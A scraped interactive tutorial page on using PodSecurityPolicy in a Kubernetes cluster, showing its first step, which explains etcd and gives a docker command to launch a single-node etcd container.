Difficulty: intermediate
Estimated Time: 10-15 minutes

This scenario explains the usage of PodSecurityPolicy in a Kubernetes cluster.

For detailed explaination of PodSecurityPolicy usage scenarios please refer to my blog article http://cloudgeekz.com/1204/docker-cluster-kubernetes-policies.html

This scenario has explained how to launch a Kubernetes cluster and use PodSecurityPolicy to enforce clsuter wide policies.

Don’t stop now! The next scenario will only take about 10 minutes to complete.

Using Pod Security Policy in a Kubernetes Cluster

Step 1 of 7

Step 1 - Etcd

Etcd is a "Distributed reliable key-value store for the most critical data of a distributed system". Kubernetes uses Etcd to store state about the cluster and service discovery between nodes. This state includes what nodes exist in the cluster, which nodes they are running on and what containers should be running.

The command below will launch a single node etcd cluster listening on port 4001. docker run -d --name=etcd \ --net=host \ gcr.io/google_containers/etcd:2.2.5 \ /usr/local/bin/etcd \ --listen-client-urls=http://0.0.0.0:4001 \ --advertise-client-urls=http://0.0.0.0:4001 \ --data-dir=/var/etcd/data

The net=host means the container will share the same network as the host, removing the need to map ports.

In production you would want to run etcd on three separate machines to ensure maximum availability.